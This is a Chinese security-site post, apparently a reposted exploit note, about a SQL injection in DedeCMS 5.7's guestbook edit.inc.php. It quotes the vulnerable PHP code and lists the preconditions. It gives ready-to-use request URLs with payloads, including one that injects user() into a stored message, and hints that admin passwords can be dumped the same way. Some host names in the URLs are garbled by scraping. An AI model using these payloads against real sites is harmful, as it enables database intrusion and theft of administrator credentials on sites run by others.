dedecms 5.7 edit.inc.php文件注射 - 网站安全 - 自学p

 

漏洞 文件edit.inc.php具体代码：<?php

 

if(!defined('DEDEINC')) exit('Request Error!');

 

if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];

else $GUEST_BOOK_POS = "guestbook.php";

 

$id = intval($id);

if(empty($job)) $job='view';

 

if($job=='del' && $g_isadmin)

{

    $dsql->ExecuteNoneQuery(" DELETE FROM `detest_guestbook` WHERE id='$id' ");

    ShowMsg("成功删除一条留言！", $GUEST_BOOK_POS);

    exit();

}

else if($job=='check' && $g_isadmin)

{

    $dsql->ExecuteNoneQuery(" UPDATE `detest_guestbook` SET ischeck=1 WHERE id='$id' ");

    ShowMsg("成功审核一条留言！", $GUEST_BOOK_POS);

    exit();

}

else if($job=='editok')

{

    $remsg = trim($remsg);

    if($remsg!='')

    {

        //管理员回复不过滤HTML

        if($g_isadmin)

        {

            $msg = "<div class=\\'rebox\\'>".$msg."</div>\n".$remsg;

            //$remsg <br><font color=red>管理员回复：</font>

        }

        else

        {

            $row = $dsql->GetOne("SELECT msg From `detest_guestbook` WHERE id='$id' ");

            $oldmsg = "<div class=\\'rebox\\'>".addslashes($row['msg'])."</div>\n";

            $remsg = trimMsg(cn_substrR($remsg, 1024), 1);

            $msg = $oldmsg.$remsg;

        }

    }

   //这里没有对$msg过滤，导致可以任意注入了

    $dsql->ExecuteNoneQuery("UPDATE `detest_guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");

    ShowMsg("成功更改或回复一条留言！", $GUEST_BOOK_POS);

    exit();

}

 

if($g_isadmin)

{

    $row = $dsql->GetOne("SELECT * FROM `detest_guestbook` WHERE id='$id'");

    require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');

}

else

{

    $row = $dsql->GetOne("SELECT id,title FROM `detest_guestbook` WHERE id='$id'");

    require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');

}

 

漏洞成功需要条件：

                          1. php magic_quotes_gpc=off

                          2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。

 

怎么判断是否存在漏洞：

                                先打开HdhCmsTest2cto测试数据 /plus/guestbook.php  可以看到别人的留言，

                                然后鼠标放在 [回复/编辑]   上 可以看到别人留言的ID。那么记下ID

                                访问：HdhCmsTestxxx测试数据/plus/guestbook.php?action=admin&job=editok&msg=90sec'&id=存在的留言ID

                                提交后如果是dede5.7版本的话 会出现 [成功更改或回复一条留言] 那就证明修改成功了

                               跳回到HdhCmsTestxxx测试数据/plus/guestbook.php 看下你改的那条留言ID是否变成了 90sec' 如果变成了 那么证明漏洞无法利用应为他开启了 php magic_quotes_gpc=off

                               如果没有修改成功，那留言ID的内容还是以前的 那就证明漏洞可以利用。

                               那么再次访问 HdhCmsTestxxx测试数据/plus/guestbook.php?action=admin&job=editok&id=存在的留言ID&msg=',msg=user(),email='

                               然后返回，那条留言ID的内容就直接修改成了 mysql 的user().

 

大概利用就是这样，大家有兴趣的多研究下！！

 

最后补充下，估计有人会说怎么暴管理后台帐户密码，你自己研究下 会知道的。反正绝对可以暴出来(不可以暴出来我就不会发)！！

查看更多关于dedecms 5.7 edit.inc.php文件注射 - 网站安全 - 自学p的详细内容...